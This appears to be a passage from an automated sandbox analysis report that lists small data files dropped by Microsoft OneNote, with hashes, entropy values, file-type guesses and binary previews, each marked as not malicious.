                                                                                                                                                                                                              SHA-512:3C79045241EFEB788D20371E69A84C85341B5A7214531E66A1CAD40F4D763184C8659F7DE025519D77ED55934B4E4C31D5D265A277EE2C670B0F0A08AF479533
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:........6.......".......................................................................................................................................................................................62......62...X/C.Z..i<Al~.y.....~.y}...L...f.~..62...X/C.Z..i<Al62....Zs{K.F.2..{.....Z.~.y}...L...f.~.9~.y..........62......62..................................................62...E..62.\....62.N....62.N.*..62.N.:..62.N.C..........................~.y..c..,.........................4..1...(...(.......M.a.n.a.g.e.d..........62...1... ..$....M.a.n.a.g.e.d...............Z.......Zs{K.F.2..{...~.y.....~.y}...L...f.~..2...............................62....Z...i................................i..c..,...................62..62...1... ..$....M.a.n.a.g.e.d...........i.......i.u.I.k.U....~.y.....~.y}...L...f.~....i.u.I.k.U......i.~.y}...L...f.~.9~.y.\w..q.O...@z...\w......>.................Zs{K.F.2..{..............................................Z..c..,...................62..62..62...1... ..$....M.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):0.7202025698320378
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:KJTPTOXODHOXTW+l+Xn2D9Xl1A7lwQEC7lM:UqeDu+X2D9+lwUl
                                                                                                                                                                                                              MD5:ADAD077CD3CE35248B3707DD06EE2782
                                                                                                                                                                                                              SHA1:FB03D348FF8C87B924EC8143888DE30CBA85B98D
                                                                                                                                                                                                              SHA-256:2AE3AE916B2264A13B76F050DFBD8582C8C750A1402BB695FD41D8D3F41D3F13
                                                                                                                                                                                                              SHA-512:46265C03A48F66245D71DC85D8D8997C3DF75CA203A86E4DF91C58EF1373D4D0A17F700C8B01980E7E5E8EA5C5CEAFCF51F11DC505D215AD75DB05641B75A029
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>...................................................................................................................................................................................................-E......-E...>@.P.mj)..............K..~:5.6.-E...>@.P.mj)..-E......K..~:5.6...................................................................................................!.....\.......N....................................................-E...c..,.........................4..1...(...(... ...D.o.c.u.m.e.n.t. .T.h.e.m.e.s...............1... ..$ ...D.o.c.u.m.e.n.t. .T.h.e.m.e.s.............1j....2G..J..?.....N...^...........................................................................................................1j....2G..J..?.............................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):0.47970405622285817
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:NTc2ozl80sEt/Bl/lyLx8Olu3afeTy+fw1EZTy+T:VcDu0xftlV38eTy4QEZTyE
                                                                                                                                                                                                              MD5:CC8D469A80141D093BFEAE144DDDA2E8
                                                                                                                                                                                                              SHA1:32462C20C71F06EFA7B5DBAB8A44E979CBBE595D
                                                                                                                                                                                                              SHA-256:D004A6F832CA8F9B21F8D5F1F283A6FFE7D8C092DB267C16BA52A9AEAE5FCA0E
                                                                                                                                                                                                              SHA-512:C0104DC2CF4A380C26EDFFDC2709DE7D7BE928E42715A59A6CB8FF1D968566106457E9D60CDEDC704F18303C3C71FFEE7C1E1F33D84EC66FDE4B16B00C2ACBE6
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>...........~.......................................................................................................................................................................................o.......o......E..._..M.........................o......E..._..M.o....................................................o.......o...................................................o.......o..\..............................................................4..1...(...(.......1.0.3.3.........1.......1.0.3.3....v.7..QO....9.L.....N...^............................................................................................................v.7..QO....9.L.............................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):0.7256883123296698
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:K0nCXjHAJbakalLyLDyXNgJydehx8felBkls0C67elBkls0317nw1Elr:KUCXjgAGLDSNHkWeIW67eIWc1jQEl
                                                                                                                                                                                                              MD5:3F0C210D399448A90A70143E704374FD
                                                                                                                                                                                                              SHA1:7688B1FC07806F06E4EA9C59EA961C80E71CAFE2
                                                                                                                                                                                                              SHA-256:C048CA3DA580192F3C3C055A503303381DA0F171B10FD93F8F0E7D7D345610AE
                                                                                                                                                                                                              SHA-512:614FF2A1740306A791F763568F08BFB4F51581912B3FE7272D3E08CF867384090653B6267A85945A0AADD001779BF97DC3AA0CA71BA17C06ADC66AE0FA1F5BE5
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.....................................................................................................................................................................................................W.......Wq...F..]0......|.......|..%C.T+.jE(...|..%C.T+.jE(...|...Wq...F..]0......W................................W.......W...................................................W.."....W\......WN......................................................|..c..,.........................4..1...(...(...$...S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s................W..1... ..$$...S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s..........g..g..N.[?..,......N...^............................................................................................................g..g..N.[?..,......................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):0.47266446354413616
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:NTcellufreolXDreoO8llu51botlyLx8Olu3af3ww1EqM:Vcellu7lTzr/DV383wQEqM
                                                                                                                                                                                                              MD5:B62FD525B67BCFBC86F856E3032D786E
                                                                                                                                                                                                              SHA1:D3A7B6BB47D558B516000389BCFAFEEE1203E239
                                                                                                                                                                                                              SHA-256:D883C8B62022D5F60D2A07E24FD7B692A16348B5375628C8927B5EB15FD76FB6
                                                                                                                                                                                                              SHA-512:7654E104BF76FF1F6AF1B40BB9E45805576FC54C46AD41BAB7B0ABDD5F83B76347607F11C43A447A4DBB4EA90FBCB989F28814792E96DBB3A5AF5E1963BD3D2F
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>...........~.........................................................................................................................................................................................U.......Uz@..A../...M..........................Uz@..A../...M..U....................................................U.......U...................................................U.......U\..............................................................4..1...(...(.......1.0.3.3.........1.......1.0.3.3...t%.*gB.@.......S....N...^...........................................................................................................t%.*gB.@.......S............................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):0.6416010012825467
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:UeEE0t2WqJ/d6r4nkNYKQQnkNYIuQEOO:UinjJFBkNbQQkNU
                                                                                                                                                                                                              MD5:987A6E3A569A40496A97700F0CD85C73
                                                                                                                                                                                                              SHA1:44214F0FB25127CBA9CB0536D311A45189BD21EF
                                                                                                                                                                                                              SHA-256:4D99DA490061C8AB0B1F8893BB461080FA13343FCC0C099756BB4FADB745C811
                                                                                                                                                                                                              SHA-512:8D59ED06908B9BA8490A3ACC4F58035CF97F24B3AA4330DCA8D724AF8939D8E1B399BBF83259EDD5E380871CB4E313FA4411EEEDF5F0FE34264955038703A0F0
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>...................................................................................................................................................................................................&......&....L..j.D.r.........................&....L..j.D.r.&...................................................&......&..................................................&..."..&.\..............................................................4..1...(...(...D...W.o.r.d. .D.o.c.u.m.e.n.t. .B.i.b.l.i.o.g.r.a.p.h.y. .S.t.y.l.e.s...............1...D...W.o.r.d. .D.o.c.u.m.e.n.t. .B.i.b.l.i.o.g.r.a.p.h.y. .S.t.y.l.e.s...............H.;.P.h.!....N...^.................................................................................................................H.;.P.h.!............................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):0.7917072259202652
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:+wfEffFyIIpFVwxU6jUIsD4anwsD4CgjlQEijN:+IJGvnawnBhG
                                                                                                                                                                                                              MD5:23CCC36C471DE186C51053A5C7E24D51
                                                                                                                                                                                                              SHA1:CE92E6F46B3CA7C38790741FBAB0FF15F7EE2792
                                                                                                                                                                                                              SHA-256:705C28CBEB020951E0EF9756656F6BD68422FDA22FEB32B35648EC184DA10853
                                                                                                                                                                                                              SHA-512:74102A4FCA898839EE278190EEFF9CBEE3DF7146F66AB7574F45D33B48663C180287E199DD5D857AE62005BE6AF43857D1D9EBF5AB8A6F2E4A4BFE5120ED2BBE
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>...................................................................................................................................................................................................fZ}.....fZ}K.g=A.6...i]Z|(......|(.;.3A.P:....|(.;.3A.P:....|(..fZ}K.g=A.6...i]ZfZ}..............................fZ}.....fZ}.................................................fZ}..#..fZ}\....fZ}N....................................................|(...c..,.........................4..1...(...(...<...W.o.r.d. .D.o.c.u.m.e.n.t. .B.u.i.l.d.i.n.g. .B.l.o.c.k.s..............fZ}..1... ..$<...W.o.r.d. .D.o.c.u.m.e.n.t. .B.u.i.l.d.i.n.g. .B.l.o.c.k.s.........I...%g.O....|.O....N...^...........................................................................................................I...%g.O....|.O....................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):0.47992039654367435
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:NTczMYflyLx8Olu3afgL3ek/jcw1EVR3ek/tK:VczTlV38gL37/wQEv37/tK
                                                                                                                                                                                                              MD5:1B899A4C2615051646B51206E501E0EC
                                                                                                                                                                                                              SHA1:FEC6CA8D3E7A30E4CF7057C819FD9C3AA899140B
                                                                                                                                                                                                              SHA-256:5A74EAAA2EBA10A032FEBE20966B8CB57211BA985641552C8DA8A7143BADEFCD
                                                                                                                                                                                                              SHA-512:274C780346CCAA6AEB5F9A091450686E521B83294BD3AA51E85C1EE080013EEFE5DE19306713E7A886FC89CC8A6E8CD3FB9E91D8104E1D5FA792E12BCF299FF2
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>...........~........................................................................................................................................................................................<0......<0...O...f5..I.........................<0...O...f5..I.<0...................................................<0......<0..................................................<0......<0\..............................................................4..1...(...(.......1.0.3.3.........1.......1.0.3.3....|.9..D.>+k.w.$....N...^............................................................................................................|.9..D.>+k.w.$............................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:big endian ispell hash file (?), 8-bit, no capitalization, 26 flags
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):1.4601270412079246
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:RpX8q+aqzryjK1heWD1fFF2AsfWoSg+cxPxBH7HF56oUWQEwXRoUG:vXlCryjKOWpFFPs+XgFxjbD65WEh5
                                                                                                                                                                                                              MD5:EE0CA34E9A30F9274FF51737FB49F36A
                                                                                                                                                                                                              SHA1:32A9068C6DEA45C996BBF5963AD2E8D88E0D1CDB
                                                                                                                                                                                                              SHA-256:301C45D3B8CF8D7AA6D35C0A5C8BC47DD4AD6F4AC469C1E4C4F21BE73B4E8F1E
                                                                                                                                                                                                              SHA-512:4618F30538EF35E92792B2F3BB3B58089254B1F3BFE576BC4ECAF627100F96506C94184F24FC37D2A73B904331BB8E0749FCE67ADA1E23AED6AF5CBE4EBDC8AD
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:........ ...............................................................................................................................................................................................?._.....?._.;.N...................E..X......d... .E...Y&.D.d........E..X.........V.d.O...yO}.c.V............d.......d...................................................d...@...d.\.....d.N.....d.N.)...d.N.6...d.N.>..............................c..,.........................4..1...(...(.......U.s.e.r.........d...1... ..$....U.s.e.r............d.......d... .E...Y&.D.V.......V.d.O...yO}.c2...............................?._......................................V...c..,....................d...d...1... ..$....U.s.e.r...........QxK.#...?.-....?._.;.N......?._..V.d.O...yO}.c.V......>.....................E..X..............................................?._..c..,....................d...d...d...1... ..$....U.s.e.r.......................QxK.#...?.-.............E..X.............
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):0.7211300824868273
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:jxfEZ3XGSbipes0lnKpqFlgncp/lOlxAnIx8CAXCkHaDWAXlapfcw1EapRK:KxVbZlgncRlOghXnHaD9XladcQEau
                                                                                                                                                                                                              MD5:0758637C804D0D7C359FF627D977F341
                                                                                                                                                                                                              SHA1:C06E071891A51D0A92F59FE8E5636DFC8B0538CC
                                                                                                                                                                                                              SHA-256:1A6D38BFF2C740AB40E9878A7F5C1E0128C252107B826BAFC58F5ADB112B38E1
                                                                                                                                                                                                              SHA-512:4DFCCA320536A7C22FADA90AA0F07AA2A2B8646B4B2DC2DD5D0FE7764A6CCC234F094802E245A641E1769296B3D5C0C9B9308F0AA0682D36F926D0248D10AF6E
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>....................................................................................................................................................................................................9.......9..P..D../,U8..............}.K....ch...9..P..D../,U8...9......}.K....ch....................................................................................................!.....\.......N.....................................................9...c..,.........................4..1...(...(... ...D.o.c.u.m.e.n.t. .T.h.e.m.e.s...............1... ..$ ...D.o.c.u.m.e.n.t. .T.h.e.m.e.s..............2.R@V.O.EPhM.......N...^............................................................................................................2.R@V.O.EPhM...............................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):0.48277285611290865
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:NTc0ennnKtAcMv5/yLx8Olu3afp9Hucw1EtY9H8K:Vcdnnmm/V38fQEt5K
                                                                                                                                                                                                              MD5:421B4BD2B2977ED982331FE04A5C6B99
                                                                                                                                                                                                              SHA1:A5F3A34DBA0C580E249E052951FCABC892173F5C
                                                                                                                                                                                                              SHA-256:32EB9F722A28BC113668D8E7A997F46573DC2919D11C5AC28A2585DDB12C16FC
                                                                                                                                                                                                              SHA-512:20B8927C39EC18E6C80C0E9A58EA159771A9379259CFAB25AA694BD6D294516A78EB4FB3CCC084EB1AF766E2391DC1EFC24886220684514B783CF80813E06F6F
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>...........~.....................................................................................................................................................................................................O..i3.{................................O..i3.{..............................................................................................................................\..............................................................4..1...(...(.......1.0.3.3.........1.......1.0.3.3...[.B...I...`..6.....N...^...........................................................................................................[.B...I...`..6.............................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):0.7317561694923703
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:KUCYWCUZ/ir4Gm7Irw6eIWAW7eIWc1JQEj:KUHWCmiOCw6m7z
                                                                                                                                                                                                              MD5:349F268E03B42FDB2287C9A57B1B78A9
                                                                                                                                                                                                              SHA1:F3DDDC55BBA8181BE651966B80F4775B85744DA9
                                                                                                                                                                                                              SHA-256:18B4E80DE6C0047D4384D87AE06D7BFD940BB5977F1F31E71CE5C4BAF29B13C1
                                                                                                                                                                                                              SHA-512:8FC533AC301ADE24EBD2185B09EB1D4261ADFEEB66121B93E026AD4FBB996B6FB81DCB77B4D0FD11A780CF7342EE8FB5D588E6709431A7F661CAE531AD179A3D
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>...............................................................................................................................................................................................................D[.D.X%{.............z...J.+..........D[.D.X%{..........z...J.+...................................................................................................."....\......N.........................................................c..,.........................4..1...(...(...$...S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s..................1... ..$$...S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........P.!}i.dG...hW0M.....N...^...........................................................................................................P.!}i.dG...hW0M.....................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):0.4811237136563258
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:NTcyR5Hz+529l3+tyLx8Olu3afj0w1E4I:Vc+5q5OqV38YQEB
                                                                                                                                                                                                              MD5:C73F2B17DAD04BB61C17219254B3BFEF
                                                                                                                                                                                                              SHA1:ABC1271243FE872332421BCF65A85CDC3DD8ED80
                                                                                                                                                                                                              SHA-256:1BADD59D7E39FFBB3703AA93BBAA3C23B3EFA20DEF304C63C9EAC899A75F5489
                                                                                                                                                                                                              SHA-512:BC3257A763CC873F64FF5E56C81ECFF00A1912685B31014D5487426EFFE2C9E28F443ADA24BA16751638023C9E1C96AD2B4EB70BB726FE69BAD0E16CFE5B735D
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>...........~.......................................................................................................................................................................................b.J.....b.Jvz..C.m..6..C........................b.Jvz..C.m..6..Cb.J..................................................b.J.....b.J.................................................b.J.....b.J\..............................................................4..1...(...(.......1.0.3.3.........1.......1.0.3.3.... .1.uF...v.LU.....N...^............................................................................................................ .1.uF...v.LU.............................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):0.6484089490864453
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:UeEJzoRl/9Gu+EnkNYKQQnkNYSMxcQEYMS:USt9Gu+EkNbQQkNfec0
                                                                                                                                                                                                              MD5:593F201CFD2A8948F1342470D0CF45A6
                                                                                                                                                                                                              SHA1:7C2B24C40E15343B25BCC119C7D0E1FC978FA7E6
                                                                                                                                                                                                              SHA-256:F9EAC3C7DA45B4E53394D0E5AC98CBE979E28CBC7A2AE6CD54FF83ADEEC51C3D
                                                                                                                                                                                                              SHA-512:1412A42D0FCF73A788DB6E63DF0EBB6E9D0493926EF2B4CDDC19CB09410FF2062784586481F2EFAD449B60A5E838A957AF8559C4E5D647D1EB1058732E1217C6
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.....................................................................................................................................................................................................?.......?.u..B.O.(*tR...........................?.u..B.O.(*tR...?....................................................?.......?...................................................?.."....?\..............................................................4..1...(...(...D...W.o.r.d. .D.o.c.u.m.e.n.t. .B.i.b.l.i.o.g.r.a.p.h.y. .S.t.y.l.e.s...............1...D...W.o.r.d. .D.o.c.u.m.e.n.t. .B.i.b.l.i.o.g.r.a.p.h.y. .S.t.y.l.e.s.........5.?.@.G...6........N...^...........................................................................................................5.?.@.G...6................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):0.7952957068761083
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:+wxRXE+MEntDHPR9WERU02Ix80cHnD2nHlXT3wcHnD2nHlEL0qB1cw1E10qBbK:+wfE+xtDvrWER/rsD45wsD4C91cQE/G
                                                                                                                                                                                                              MD5:B020D8EA092E3374BA1810DACF72E2D2
                                                                                                                                                                                                              SHA1:D332ECB94E7F52145E40E212FD5190EE2809D1C2
                                                                                                                                                                                                              SHA-256:DE2ECF51F08723240FBF8D6A79B1D0909E94E540D30E85B31677F312774AFBC2
                                                                                                                                                                                                              SHA-512:CA264DC384772E3E2F3FA70E7F39063AFD27035625B84C002D649C951689A95B018F268546EE2735DA3771CA71718C6B93D3EA004CE3754E51C010AFC66ED044
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>...................................................................................................................................................................................................h.......h...YM......n_.t.......t...|pH.u!.*hw,.t...|pH.u!.*hw,.t..h...YM......n_h.................................t.......t...................................................t...#...t.\.....t.N....................................................h....c..,.........................4..1...(...(...<...W.o.r.d. .D.o.c.u.m.e.n.t. .B.u.i.l.d.i.n.g. .B.l.o.c.k.s...............t...1... ..$<...W.o.r.d. .D.o.c.u.m.e.n.t. .B.u.i.l.d.i.n.g. .B.l.o.c.k.s...........y\..QD.Y.)..6.....N...^.............................................................................................................y\..QD.Y.)..6.....................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):0.4841180160260744
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:NTcs5/48RiuDAqDiZyLx8Olu3afIw1EF3:Vcs5TliZV38IQEl
                                                                                                                                                                                                              MD5:E1450FC726D2912BF4DF8ED52F6BF949
                                                                                                                                                                                                              SHA1:3958445081A7CC0980B5399555A43B7C27E02759
                                                                                                                                                                                                              SHA-256:61F7584D259E65018AB8E982E1F3151AEC726DFD8667B85E695F51C6884731C2
                                                                                                                                                                                                              SHA-512:47F0A0E65BEC234B859FDCD1A97DC0676CE1B72C6250EEEF4DE84246878B9F10807CC40179ACCA3414F4CD6ED8ACEFCC02E5659060B899EB4C2DDCFF77C7CF08
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>...........~.......................................................................................................................................................................................6.&.....6.&.x..O......e........................6.&.x..O......e6.&..................................................6.&.....6.&.................................................6.&.....6.&\..............................................................4..1...(...(.......1.0.3.3.........1.......1.0.3.3...j@...e.L..K.|fC.....N...^...........................................................................................................j@...e.L..K.|fC.............................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):0.699815212267818
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:ga0C+mNmQYOL8XZgX7Vu8ZAJx8iDwV8uWDwVhQqw1EguS:ghCJNOOL84IBNDwV3WDwVh/QEgN
                                                                                                                                                                                                              MD5:18735779805D3EE85412ABCEC07866A9
                                                                                                                                                                                                              SHA1:198AF9C30CE5BB24903060F2A44B78EDC0E599C0
                                                                                                                                                                                                              SHA-256:2CBF8EF7A67B4123CACAC38D3618E2DA68B8F499CDFE47B43CBBBA7F89B69902
                                                                                                                                                                                                              SHA-512:C8981D8CAD0D657900FD84C010A62D635256C79BFA92B3C80A7A5ADA8AECFAC842FCBBA8F20E36E79750F1B49693BCA87B009CEDBFB49318BE8516304D4348A5
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>...................................................................................................................................................................................................$.*.....$.*.G..J.0.Fq..............}.]N.....s.$.*.G..J.0.Fq..$.*.....}.]N.....s...................................................................................................!.....\.......N....................................................$.*..c..,.........................4..1...(...(.......L.i.v.e.C.o.n.t.e.n.t...............1... ..$....L.i.v.e.C.o.n.t.e.n.t...................C....~.....N...^.................................................................................................................C....~.............................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:OpenPGP Secret Key
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):0.9191746294518338
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:9/RssHrJ+gorLsAHYYB7TyKlolshIx8M15A5rAYdrJC3wOA2u/olrmw1Eju/oll0:zP4g4VvNTXl4rsPCAOxCowQEjCo/0
                                                                                                                                                                                                              MD5:C3CFFCC40C6E78DCB91584580BACD9C5
                                                                                                                                                                                                              SHA1:C90527127A0567F0C8663CF3DC729B3FACF5ABE7
                                                                                                                                                                                                              SHA-256:8BC2179705A85D5953B3AA80F00808AE7BA532802654C8180DD0AF835452BE64
                                                                                                                                                                                                              SHA-512:968387481DAF482E66D474B2501B48AA2202D3FBE0B46DD163A0C902999160E2C93A3669B1A152C3534F19A12E8547FD7C92C9B48E7BD583B6243B4ED3A71A76
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:....>..............................................................................................................................................................................................................y..E......b..:.......:.8b%1B.....$...:.8b%1B.....$..:..b..A..D...f.;2.b......y..E......b..............b.......b...................................................b....+..b..\....b..N....b..N.)...........................................:...c..,.........................4..1...(...(.......1.6............b....1... ..$....1.6.......b.......b..A..D...f.;2..:.......:.8b%1B.....$.2.............................................................................c..,...................b...b....1... ..$....1.6............Q...@.M.{...v<9....N...^............................................................................................................Q...@.M.{...v<9............................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:OpenPGP Public Key
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):1.5016695008424554
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:uWPUjN7pM6pl6cxlx91PQu1qnIUajEUasXid797BEUauiv9KnWygAD7gEUaOEUah:uci7pM6plj35KKludlIFqgAD7gl3lO
                                                                                                                                                                                                              MD5:74710F00067A270EC266E0169B21E907
                                                                                                                                                                                                              SHA1:7212FB29F176DC9208F8FF73B09487DDB815EB5B
                                                                                                                                                                                                              SHA-256:4B1A991435591AC772A2776E392E553DF9A754B92049A692A7D04F015D5F95AC
                                                                                                                                                                                                              SHA-512:7B83E620449431682A15AA26339439D952611FF4058BF35BB8A4A23880FA1575094700BE2A7FAB75180F167E2B7AD68B9B2A511C5E9BF6E86EB0FC20E75335A2
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:........*...............................................................................................................................................................................................Vz......Vz..w..G.".j..8...H.......H[..A.b3.......H[..A.b3.......H......(.B..r.l..q....)...AW.K.-......)............).......)...................................................)....B..)..\....)..N....)..N.*..)..N.:..)..N.@............................H..c..,.........................4..1...(...(.......M.a.n.a.g.e.d..........)....1... ..$....M.a.n.a.g.e.d.............).......)...AW.K.-...................(.B..r.l...2.................................H.).........................................c..,...................)...)....1... ..$....M.a.n.a.g.e.d..........t.......t..\.L...ng..>.............(.B..r.l..qVz..w..G.".j..8.Vz..)...AW.K.-......)....t..\.L...ng..>.t......>....................(.B..r.l..q..........................................t...c..,...................)...)...)....1... ..$....M.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):0.7227468501643087
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:K3I/rHLBHVu6In82IXnSQ9XlWrZcQE7ra:EIT91u685IXP9wlcX
                                                                                                                                                                                                              MD5:174226F2D4A943576E4469DB05E6E1F6
                                                                                                                                                                                                              SHA1:A0717E5BC6FBBD0AF4A2A5053C90582E114E3290
                                                                                                                                                                                                              SHA-256:AB45CAF2FBDC33FDD2B8043F24767F2EFE03791A90A41991C03843057962AE6A
                                                                                                                                                                                                              SHA-512:71B0A55ECE31EC177004117069C3269138428361CEDA77C31CA7AE18CB7C484AD7BCDB6680B1A0B60977301C486C21C2E4388D516681756C78C7875495DFB356
                                                                                                                                                                                                              Malicious:false
